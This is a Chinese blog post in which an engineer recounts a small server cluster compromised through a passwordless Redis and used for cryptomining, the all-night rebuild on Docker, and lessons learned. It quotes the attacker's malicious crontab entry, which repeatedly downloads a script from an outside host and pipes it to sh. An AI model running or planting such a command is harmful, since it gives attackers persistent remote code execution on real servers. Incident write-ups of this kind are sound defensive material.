zoukankan      html  css  js  c++  java
  • 一次服务器集群被攻击中的教训

    2020 祝定不是一个平凡的年,昨天我一朋友他们公司开年会,喊我一起去热闹热闹,结果刚吃上饭,喝了二两,然后接领导给我打电话,然后我看了下一下几十条报警短信,知道服务被攻击挖矿了,是我们的一个小集群(4台服务),我估计肯定 是redis服务器着了,因为之前测试环境的时候我们也没到过,然后报着jiao性的心理就没有修改,因为那集群是我拼盘的时候就已经在了,领导也没要求升级啥的,redis明显没有密码,应该是跳入了服务器的内网,把我们其它几台服务都给端了,资源,CPU,负载,内存很高,整个有10来个域名,网站 APP 小程序各种访问不了各种炸,赶紧的打车回公司,认真想了下,决定把所有的服务器都重装,随便把所有的都换成docker上,就这样奋斗了一个通宵,早上业务数据全面恢复,真的太累了好久都没有通宵了

    黑客的手段基本就是计划任务:/var/spool/cron/里面有没有数据 ,一般可以用crontab -e 来修改

    恶意脚本路径:/var/spool/cron/cdsbxmt
    恶意脚本标签:远程加载命令,恶意定时任务持久化

     

      基本是这种

    */10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh
    

      总结 还是不要抱侥幸心里,架构还是要足够清晰,这样不容易挖坑

  • 相关阅读:
    PHP面向对象----- 类的自动加载
    PHP基础知识------页面静态化
    Laravel 开发环境搭建
    jenkins相关学习
    markdown语法学习强化
    bind 使用和配置记录
    关于整形和浮点型的格式输出
    函数体中定义的结构体和类型
    Volatile & Memory Barrier
    各种简单排序算法模版
  • 原文地址:https://www.cnblogs.com/jackluo/p/12192675.html
Copyright © 2011-2022 走看看